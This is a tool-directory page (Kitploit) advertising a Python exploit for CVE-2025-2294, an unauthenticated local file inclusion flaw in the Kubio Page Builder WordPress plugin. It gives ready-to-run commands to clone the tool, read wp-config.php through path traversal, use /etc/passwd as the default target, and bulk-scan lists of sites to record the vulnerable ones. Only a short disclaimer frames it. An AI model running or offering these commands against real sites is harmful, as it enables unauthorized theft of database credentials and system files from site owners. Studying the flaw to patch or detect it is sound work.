Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-2294 | Kitploit
Tools/GitHubGitHub/mrrivaldo/cve-2025-2294
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringWeb SecurityPenetration Testing
GitHubmrrivaldo/cve-2025-2294

CVE-2025-2294

View Repository
1 year agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Kubio Page Builder LFI Exploit (CVE-2025-2294)

Python License Vulnerability

Local File Inclusion (LFI) exploit for Kubio Page Builder WordPress plugin (versions ≤ 2.5.1).

📌 Description

This tool exploits an unauthenticated LFI vulnerability in Kubio Page Builder plugin (CVE-2025-2294), allowing attackers to read sensitive files on vulnerable WordPress installations.

🚀 Features

  • Single target mode (-u)
  • Bulk scanning from file (-l)
  • Version detection
  • Output results to file (-o)
  • Automatic vulnerable version check
  • Custom file path support

📦 Installation

root@kitploit:~
git clone https://github.com/mrrivaldo/CVE-2025-2294.git

🛠 Usage

Basic Single Target

root@kitploit:~
python3 cve-2025-2294.py -u https://vulnerable-site.com

Custom File Path

root@kitploit:~
python3 cve-2025-2294.py -u https://vulnerable-site.com -f ../../wp-config.php

Bulk Scan Mode

root@kitploit:~
python3 cve-2025-2294.py -l targets.txt -o results.txt

Help Menu

root@kitploit:~
python3 cve-2025-2294.py --help

⚙ Options

📝 Example File Structure

targets.txt:

root@kitploit:~
https://wordpress-site1.com
http://wordpress-site2.com
https://another-vulnerable-site.com

⚠ Legal Disclaimer

This tool is for educational purposes only. The developer is not responsible for any misuse. Always obtain proper authorization before testing any systems.

Download Tool
OptionDescription
-u, --urlSingle target URL
-l, --listFile containing list of targets
-f, --fileFile to read (default: /etc/passwd)
-o, --outputSave vulnerable targets to file